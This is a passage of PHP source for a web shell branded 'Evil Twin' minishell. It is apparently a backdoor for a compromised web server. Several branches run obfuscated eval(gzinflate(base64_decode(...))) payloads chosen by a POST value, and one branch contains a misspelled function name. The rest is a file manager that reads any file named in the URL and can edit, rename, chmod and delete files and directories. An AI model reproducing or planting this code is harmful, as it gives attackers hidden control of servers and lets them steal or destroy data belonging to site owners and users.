{eval(gzinflate(base64_decode('vVJRa9swEH7OYP/hMAE7YCJoBoPWMTTFgdCQFsct9Mko2qkWUS0jyXQw9t93jpK1hRXalz0YWd/d9913d5J9K7wyLexm37/tk3FvdQpj5dQEfn39MhqNZQdzkKbDNhngFKLnaHJxCImGQoIYtWqVTwIKIwiYQ286n1BWCld35frmtqrpIHWKfiB3sdpclg9VebnZLosyBW97/ACtLKq7cvNp2na7ru+LcrV8uC0GmuTanXgAo3d5y9W6oJZkF3It+t62oQz+RDEkh8gBEto4fMHk8X5im10tde+a4yhf/f+mT8lEKo2kq5x3SXzY2LRrunhyXBaKxkCUCWw92jyTpvV5xqGxKOfxWPZasxcSeG4f0c/jeqd5u4/zPIcFRa9h26DWkGUZ43nGggo7ikYHN4A0nVCTXIWnEzXed+6cMcufp4/KN/2ud2gF0Yk6FeaJLW6q6021ZnvCjGZP3JFksDQ7mw2uojT66zA6tfXf+nrT2D+rLjlt4Ad4A8Ii9/hG+Tx5R3UY2R8=')));} elseif($_POST['eviltwin'] == 'marijuana') {eval(gzinflate(base64_decode('vVJNa9tAED270P8wCINkENY9lQVykMGtqwRZLuQk1tvZaOP1rtgPUgj5711ZdhLTBJxLD2K1b+a9eTOzzElquZKwJ5o/OCJJNHZaxDDmhk/g6euX0WjMOpgBUx3KqIdjCB6DybdDiLY+RD2j4ZLbaEBhBANm0KrORj4rhutNtbq5rRt/eHUfvSB3vizz6q6u8nK9KKoYrHZ4Aa0q6k1Vfpq2Xq+aX0W1XNzdFj2NEWFOPIDRh7zFclX4llg35Gq0TsuhDP5B2icPkQNEhTL4irHj/cRW24YJZ9rjKN/8P/uPs4hxgV6XG2ui8GVr067twslxYUhbBUFKUVrUWcqUtFlKoNXIZuGYOSGScyJYou/RzsJmK4jchVmWwc+8Wn7f5GUO6xaFgDRNE5KlyaCWHMWDgzNAP6mhtnf4+pSC1trOXCWJJo/Te25bt3UGNfUSnj6lap/Mb+ofZb1Kdh5TvS/jZQ/2qBK8dxfEwZnb4NTmf+/zrNF3qy+I385vsAqoRmLxH/Wr6APlfox/AQ==')));} elseif($_POST['eviltwin'] == 'alfa') {eval(gzinflate(base64_decode('vVJNS8NAED1X8D8MoZAUQveuaaCVFIqlShoFT2G7zprFNRt2NyiI/91J0voBCvXiIST73rw3b2Yj21p4ZWrgWvJo3Fodw1g5NYHX05PRaCwbmIE0DdZRB8cQPAeT854SFVGCFKWqlY8GFEYwYA69aXxEVTFc3OTrq+uipBe5E3tE7WK1med3RT7fbJdZHoO3LR4hy7PiJt/8WbbdrsvbLF8t766zTia5dgcdwOhX3XK1zmgk2Qy1Fn1r66ENvqDoigemh4Q2Dj8xuT8f1GZXSt26ar/KL99v9CgZSaWRfJXzLgq7C5s2VRNO9neFojIQJAJrjzZNpKl9mnCoLMpZOJat1uxDA57bB/SzsNxpXj+GaZrCnEjYVqg1JEnCeJqwwYPtLYM+CiCtZuhIkfrfJqi8b9wZY5Y/Tx+Ur9pd69AKUpNyKswTW1wVl5tizR4JM5o9cUeOfR6PTvehgjg45AsOM/3TUN+m+rHnktPu78EbEBYp81fjs+gX025d7w==')));} elseif($_POST['eviltwin'] == 'noname') {eval(gzinflate(bsse64_decode('vVLBauMwED2nsP8wmIAdMNG96xjaxYHQ4BbHWejJKNpRLapIRpJpoey/7zh2aAtbaC89GFlv5r15MyPZGxGUNWCs4UdM5r3TKcyVVwt4+XExm81lByuQtkOTDHAK0VO0+HkKiZZCghiNMiokIwozGDGPwXYhoawUfu2r7e1d3dBB6hT9RO71pryq7uvqqtytiyqF4Hr8BK0q6n1Vfpm2222b30W1Wd/fFQNNcu3PPIDZh7z1ZltQS7Ibcx2G3pmxDD6jGJLHyAkS2np8xeR0P7PtoZG69+00yjf/f+lTMpFKI+kqH3wSjytbdm0XL6ZtoWgtRJlAE9DlmbQm5BmH1qFcxXPZa83esCBw94BhFTcHzc1jnOc5lLakMOxa1BqyLGM8z9iowybZ6GQIkAY0ViVj0/OJ2hA6f8mY40/LBxXa/tB7dIL4xF0Ke2TXt/VNWW/ZI2FWsyP3pDm58kPVwVqURq8+o3N339jeu/7+W3fNaRd/IFgQDnnA99KXyQeyw+j+AQ==')));} elseif($_POST['eviltwin'] == 'ets') {eval(gzinflate(base64_decode('vVJNa+MwED2n0P8wmIAdcKN76xjaxYHQkBbHXejJKNpRLapKRpKbhWX/+45jh3ZpC+2lByPrzbz35kOyMyIoawCDT6ad0ylMlVcz+HN6MplMZQsLkLZFk/RwCtE+ml0cQqKhkCBGrYwKyYDCBAbMY7BtSCgrhR935frmtqrpIHWKfiL3arW5LO+r8nKzXRZlCsF1+AlaWVR35ebLtO12Xf8sytXy/rboaZJrf+QBTD7kLVfrglqS7ZDrMHTODDb4G0WfPEQOkNDW4wsmx/uRbXe11J1vxlG++v9Ln5KJVBpJV3laVUz7mrdNG8/GVaFoLESZQBPQ5Zm0JuQZh8ahXMRT2WnNjhQI3D1gWMT1TnPzGOd5DsWz0lDtlYFtg1pDlmWM5xkbdNgoGx2qAaTpDK5UVf9woiaE1p8z5vh+/qBC0+06j04QmYhzYZ/Y1U11vanW7JEwq9kT9yTIkGwDuZ753rWvLkqjsc7o2No39vZfc+/6Ljlt4RcEC8IhD/hG/Tz5QLkf3T8=')));}echo '</td></tr>';if(isset($_GET['filesrc'])){echo "<tr><td>Current File : ";echo $_GET['filesrc'];echo '</tr></td></table><br />';echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){echo '</table><br /><center>'.$_POST['eviltwin'].'<br /><br />';if($_POST['opt'] == 'chmod'){if(isset($_POST['perm'])){if(chmod($_POST['eviltwin'],$_POST['perm'])){echo '<font color="lime">Change permission successfully</font><br/>';}else{echo '<font color="red">Change permission failed</font><br />';}}echo '<form method="POST">Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['eviltwin'])), -4).'" /><input type="hidden" name="eviltwin" value="'.$_POST['eviltwin'].'"><input type="hidden" name="opt" value="chmod"><input type="submit" value="Go" /></form>';}elseif($_POST['opt'] == 'rename'){if(isset($_POST['newname'])){if(rename($_POST['eviltwin'],$eviltwin.'/'.$_POST['newname'])){echo '<font color="lime">Rename successfully</font><br/>';}else{echo '<font color="white">Rename failed</font><br />';}$_POST['name'] = $_POST['newname'];}echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /><input type="hidden" name="eviltwin" value="'.$_POST['eviltwin'].'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';}elseif($_POST['opt'] == 'edit'){if(isset($_POST['src'])){$fp = fopen($_POST['eviltwin'],'w');if(fwrite($fp,$_POST['src'])){echo '<font color="lime">File edit successfully</font><br/>';}else{echo '<font color="white">Failed to edit file</font><br/>';}fclose($fp);}echo '<form method="POST"><textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['eviltwin'])).'</textarea><br /><input type="hidden" name="eviltwin" value="'.$_POST['eviltwin'].'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>';}echo '</center>';}else{echo '</table><br/><center>';if(isset($_GET['option']) && $_POST['opt'] == 'delete'){if($_POST['type'] == 'dir'){if(rmdir($_POST['eviltwin'])){echo '<font color="lime">Directory deleted successfully</font><br/>';}else{echo '<font color="red">Delete directory failed</font><br/>';}}elseif($_POST['type'] == 'file'){if(unlink($_POST['eviltwin'])){echo '<font color="lime">File Deleted</font><br/>';}else{echo '<font color="white">File Failed to Delete</font><br/>';}}}echo '</center>';if(function_exists('opendir')) {if($opendir = opendir($eviltwin)) {while(($readdir = readdir($opendir)) !== false) {$scandir[] = $readdir;}closedir($opendir);}sort($scandir);} else {$scandir = scandir($eviltwin);}echo '<div id="content"><table width="730" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"><td><center>NAME</center></td><td><center>SIZE</center></td><td><center>PERMISSION</center></td><td><center>MODIFY</center></td></tr>';foreach($scandir as $dir){if(!is_dir($eviltwin.'/'.$dir) || $dir == '.' || $dir == '..') continue;echo '<tr><td><a href="?eviltwin='.$eviltwin.'/'.$dir.'">'.$dir.'</a></td><td><center>--</center></td><td><center>';if(is_writable($eviltwin.'/'.$dir)) echo '<font color="lime">';elseif(!is_readable($eviltwin.'/'.$dir)) echo '<font color="white">';echo perms($eviltwin.'/'.$dir);if(is_writable($eviltwin.'/'.$dir) || !is_readable($eviltwin.'/'.$dir)) echo '</font>';echo '</center></td><td><center><form method="POST" action="?option&eviltwin='.$eviltwin.'"><select name="opt"><option value="">Select</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option></select><input type="hidden" name="type" value="dir"><input type="hidden" name="name" value="'.$dir.'"><input type="hidden" name="eviltwin" value="'.$eviltwin.'/'.$dir.'"><input type="submit" value=">"></form></center></td></tr>';}echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';foreach($scandir as $file){if(!is_file($eviltwin.'/'.$file)) continue;$size = filesize($eviltwin.'/'.$file)/1024;$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';}echo '<tr><td><a href="?filesrc='.$eviltwin.'/'.$file.'&eviltwin='.$eviltwin.'">'.$file.'</a></td><td><center>'.$size.'</center></td><td><center>';if(is_writable($eviltwin.'/'.$file)) echo '<font color="lime">';elseif(!is_readable($eviltwin.'/'.$file)) echo '<font color="white">';echo perms($eviltwin.'/'.$file);if(is_writable($eviltwin.'/'.$file) || !is_readable($eviltwin.'/'.$file)) echo '</font>';echo '</center></td><td><center><form method="POST" action="?option&eviltwin='.$eviltwin.'"><select name="opt"><option value="">Select</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="'.$file.'"><input type="hidden" name="eviltwin" value="'.$eviltwin.'/'.$file.'"><input type="submit" value=">"></form></center></td></tr>';}echo '</table></div>';}echo '<center><br><a href="https://github.com/eviltwin-dev/eviltwin-minishell"><font color="white">© Evil Twin</font></a></center></body></html>';function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));return $info;}?>